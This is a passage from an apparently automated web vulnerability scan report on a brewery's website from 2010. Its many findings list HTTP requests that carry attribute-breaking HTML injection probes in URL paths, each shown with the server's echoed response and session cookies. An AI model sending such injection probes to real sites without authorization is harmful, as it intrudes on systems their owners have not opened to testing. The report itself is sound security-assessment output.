...[SNIP]...
<body id="media73fdc"><a>3284c577b00_page" class="media73fdc">
...[SNIP]...

1.340. http://www.ninkasibrewing.com/media/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1309"><a>af44161986e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mediaf1309"><a>af44161986e/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="mediaf1309"><a>af44161986e_page" class="mediaf1309">
...[SNIP]...

1.341. http://www.ninkasibrewing.com/media/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba126"><a>4d385f007ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mediaba126"><a>4d385f007ef/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="mediaba126"><a>4d385f007ef_page" class="mediaba126">
...[SNIP]...

1.342. http://www.ninkasibrewing.com/media/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95c3f"><a>1b1450f199e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media95c3f"><a>1b1450f199e/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="media95c3f"><a>1b1450f199e_page" class="media95c3f">
...[SNIP]...

1.343. http://www.ninkasibrewing.com/merchandise/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0d2"><a>96b73e45a3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandisecc0d2"><a>96b73e45a3f/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandisecc0d2"><a>96b73e45a3f_page" class="merchandisecc0d2">
...[SNIP]...

1.344. http://www.ninkasibrewing.com/merchandise/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22a36"><a>9072d5717d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise22a36"><a>9072d5717d1/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandise22a36"><a>9072d5717d1_page" class="merchandise22a36">
...[SNIP]...

1.345. http://www.ninkasibrewing.com/merchandise/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25227"><a>b79974bebcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise25227"><a>b79974bebcc/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandise25227"><a>b79974bebcc_page" class="merchandise25227">
...[SNIP]...

1.346. http://www.ninkasibrewing.com/merchandise/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89685"><a>8d9b398e636 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise89685"><a>8d9b398e636/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandise89685"><a>8d9b398e636_page" class="merchandise89685">
...[SNIP]...

1.347. http://www.ninkasibrewing.com/merchandise/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bca3"><a>74020e256ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise3bca3"><a>74020e256ae/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandise3bca3"><a>74020e256ae_page" class="merchandise3bca3">
...[SNIP]...

1.348. http://www.ninkasibrewing.com/merchandise/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3133"><a>eb248c2c902 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandised3133"><a>eb248c2c902/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandised3133"><a>eb248c2c902_page" class="merchandised3133">
...[SNIP]...

1.349. http://www.ninkasibrewing.com/merchandise/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea445"><a>ad2f0e43886 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandiseea445"><a>ad2f0e43886/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandiseea445"><a>ad2f0e43886_page" class="merchandiseea445">
...[SNIP]...

1.350. http://www.ninkasibrewing.com/nw_local_challenge/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db203"><a>4f8704b46ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challengedb203"><a>4f8704b46ee/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challengedb203"><a>4f8704b46ee_page" class="nw_local_challengedb203">
...[SNIP]...

1.351. http://www.ninkasibrewing.com/nw_local_challenge/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38544"><a>e12729cb39a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge38544"><a>e12729cb39a/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge38544"><a>e12729cb39a_page" class="nw_local_challenge38544">
...[SNIP]...

1.352. http://www.ninkasibrewing.com/nw_local_challenge/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81cc4"><a>8f45631c571 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge81cc4"><a>8f45631c571/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge81cc4"><a>8f45631c571_page" class="nw_local_challenge81cc4">
...[SNIP]...

1.353. http://www.ninkasibrewing.com/nw_local_challenge/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54de6"><a>a3833a021cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge54de6"><a>a3833a021cc/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge54de6"><a>a3833a021cc_page" class="nw_local_challenge54de6">
...[SNIP]...

1.354. http://www.ninkasibrewing.com/nw_local_challenge/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d04"><a>66d6e311014 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge95d04"><a>66d6e311014/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge95d04"><a>66d6e311014_page" class="nw_local_challenge95d04">
...[SNIP]...

1.355. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c482f"><a>c37a6af9fd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challengec482f"><a>c37a6af9fd4/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challengec482f"><a>c37a6af9fd4_page" class="nw_local_challengec482f">
...[SNIP]...

1.356. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa881"><a>c321163ae3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challengefa881"><a>c321163ae3c/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challengefa881"><a>c321163ae3c_page" class="nw_local_challengefa881">
...[SNIP]...

1.357. http://www.ninkasibrewing.com/process/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a9d3"><a>dfa1e21e09f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process7a9d3"><a>dfa1e21e09f/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
